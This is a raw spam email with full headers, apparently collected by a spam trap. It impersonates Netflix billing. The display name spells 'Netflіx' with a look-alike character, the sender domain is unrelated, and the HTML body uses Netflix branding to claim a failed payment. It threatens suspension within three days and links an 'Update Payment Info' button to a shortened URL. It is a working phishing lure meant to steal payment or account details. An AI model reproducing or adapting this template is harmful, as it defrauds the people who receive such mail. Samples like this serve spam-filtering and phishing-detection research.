Return-Path: <postmaster@d084f49f30.nxcli.io>
Delivered-To: untroubl8492-bruce@untroubled.org
Received: (qmail 3140232 invoked from network); 12 Jul 2025 03:47:33 -0000
Received: from cloudhost-5951185.us-midwest-1.nxcli.net (cloudhost-5951185.us-midwest-1.nxcli.net [209.87.158.85])
  by vx0.untroubled.org ([45.63.65.23])
  with ESMTP via TCP; 12 Jul 2025 03:47:33 -0000
Comment: DomainKeys? See http://domainkeys.sourceforge.net/
DomainKey-Signature: a=rsa-sha1; q=dns; c=nofws;
  s=default; d=d084f49f30.nxcli.io;
  b=HelMbPrf7HtY+QOilpAMhFNIBEvIc1/cjMbMV7T8CWXlJV/LrQ+sqVBLPPY0QMHoKtdIRkysqULLiRHXgA+DF2EA1pghRMrj+7LTlQzBMrxLrm/JAnjukSTUBpC0OTQgzDNlm9GW4op8b/yuLak1KkopwQuKP2gkGEFQQBiN/vz0FLXljMdE/XFeZCnWWeuW1MAGXvRaH32da/X4dLII/2vyZlPvt+UK4meDN1HH31AH6OOVth2lS36mOl3uA35M83prPQdMzrS2k9skQJ3igFNL15y0ENjlOBRAU5smr0pywFayoZaNlH+20zSIgEEmTK+fdTb4ke9izZRo3n8kFQ==;
  h=Received:Date:Message-ID:To:Subject:X-PHP-Originating-Script:From:Reply-To:MIME-Version:Content-Type:X-Mailer:X-Priority:List-Unsubscribe;
DKIM-Signature: v=1; a=rsa-sha256; c=relaxed; d=d084f49f30.nxcli.io; h=
	date:message-id:to:subject:from:reply-to:mime-version
	:content-type:list-unsubscribe; s=default; bh=hUi7FyOgNG5xXBiqM6
	gtWPYmhh4mWRI4wQTOYhikibY=; b=csx5ivfaY3YCYTe4Q3ucDIbloApFn92Eh5
	GtBJ4X/p2snzMhC3Q4XHwVGEJfGrDNMwpO2/Fhe8xMId8MxeVkFVUZ4KJ4FmThd3
	lSo3kBhBGzPOG5DQ+rrIZQOVj24UpGBl/T1kutIti2Zbo3z53Ap9Qi6Cg7mKNT7J
	hRPMqe74txmkPftuj6+FidQUPL8PX6/GHV6S1PoQD5+7CwW7w8UaCngbJB0LrsBU
	u/TC/62cN5TaL+/2+cU2yWz3oN1x33dXoHlpY2AV9sz5Zs6VB9ItCZi0qcZ8TPMs
	OFni7NfeRV8Jjw3K/ITVpCLRmE5/65ZfLXqAACvfbJ/COSgOXq3g==
Received: (qmail 30436 invoked by uid 10159); 12 Jul 2025 03:47:32 +0000
Date: 12 Jul 2025 03:47:32 +0000
Message-ID: <20250712034732.30416.qmail@cloudhost-5951185.us-midwest-1.nxcli.net>
To: bruce@untroubled.org
Subject: Payment Notification
X-PHP-Originating-Script: 10159:done.php
From: "Netflіx Support" <uay7jbmg@svr.io>
Reply-To: uay7jbmg@svr.io
MIME-Version: 1.0
Content-Type: text/html; charset=UTF-8
X-Mailer: PHP/8.2.20
X-Priority: 3
List-Unsubscribe: <mailto:unsubscribe@uay7jbmg@svr.io>
Content-Length: 3639


<!DOCTYPE html>
<html lang="en" >
<head>
  <meta charset="UTF-8" />
  <meta name="viewport" content="width=device-width, initial-scale=1" />
  <title>Netflix Payment Reminder</title>
  <style>
    /* Reset and base styles */
    body, table, td, a {
      -webkit-text-size-adjust: 100%;
      -ms-text-size-adjust: 100%;
    }
    body {
      margin: 0;
      padding: 30px 0;
      background-color: #f4f5f7;
      font-family: 'Segoe UI', Arial, sans-serif;
      color: #333333;
      -webkit-font-smoothing: antialiased;
      -moz-osx-font-smoothing: grayscale;
    }
    table {
      border-collapse: collapse !important;
    }
    a {
      color: #e50914; /* Netflix red */
      text-decoration: none;
    }
    .email-container {
      max-width: 540px;
      margin: 0 auto;
      background: #ffffff;
      border-radius: 12px;
      box-shadow: 0 4px 18px rgba(0,0,0,0.06);
      padding: 30px 28px;
    }
    .logo {
      text-align: center;
      margin-bottom: 20px;
    }
    .logo img {
      width: 100px;
      height: auto;
      display: block;
      margin: 0 auto;
    }
    h2 {
      font-size: 22px;
      color: #e50914;
      text-align: center;
      margin-bottom: 14px;
      font-weight: 700;
    }
    p {
      font-size: 15px;
      line-height: 1.6;
      text-align: center;
      margin: 0 0 16px;
    }
    .button-container {
      text-align: center;
      margin: 28px 0;
    }
    .button {
      background-color: #e50914;
      color: #ffffff;
      padding: 12px 30px;
      font-size: 15px;
      font-weight: 700;
      border-radius: 8px;
      display: inline-block;
      box-shadow: 0 4px 10px rgba(229, 9, 20, 0.4);
      transition: background-color 0.3s ease;
    }
    .button:hover {
      background-color: #b20710;
      text-decoration: none;
    }
    .footer {
      font-size: 12px;
      color: #999999;
      text-align: center;
      margin-top: 22px;
      line-height: 1.4;
      font-style: italic;
    }
    /* Responsive */
    @media screen and (max-width: 600px) {
      .email-container {
        width: 100% !important;
        border-radius: 0;
      }
      .logo img {
        width: 80px;
      }
    }
  </style>
</head>
<body>
  <center>
    <table width="100%" bgcolor="#f4f5f7" cellpadding="0" cellspacing="0" role="presentation">
      <tr>
        <td>
          <table class="email-container" role="presentation" cellpadding="0" cellspacing="0" width="540" bgcolor="#ffffff">
            <tr>
              <td>
                <div class="logo">
                  <img src="https://upload.wikimedia.org/wikipedia/commons/0/08/Netflix_2015_logo.svg" alt="Netflix Logo" width="100" height="auto" />
                </div>
                <h2>Payment Required to Continue Your Netflix Membership</h2>
                <p>Dear Customer,</p>
                <p>We noticed that your recent payment was not successful. To avoid interruption of your Netflix service, please update your payment information as soon as possible.</p>
                <div class="button-container">
                  <a href="https://t.co/58RjTecRcC?id=-4038572188080016832-8736" class="button" target="_blank" rel="noopener">Update Payment Info</a>
                </div>
                <p>If payment is not received within 3 days, your membership will be suspended.</p>
                <div class="footer">
                  Thank you for being a valued Netflix member.<br /><br />
                  — Netflix Billing Team
                </div>
              </td>
            </tr>
          </table>
        </td>
      </tr>
    </table>
  </center>
</body>
</html>

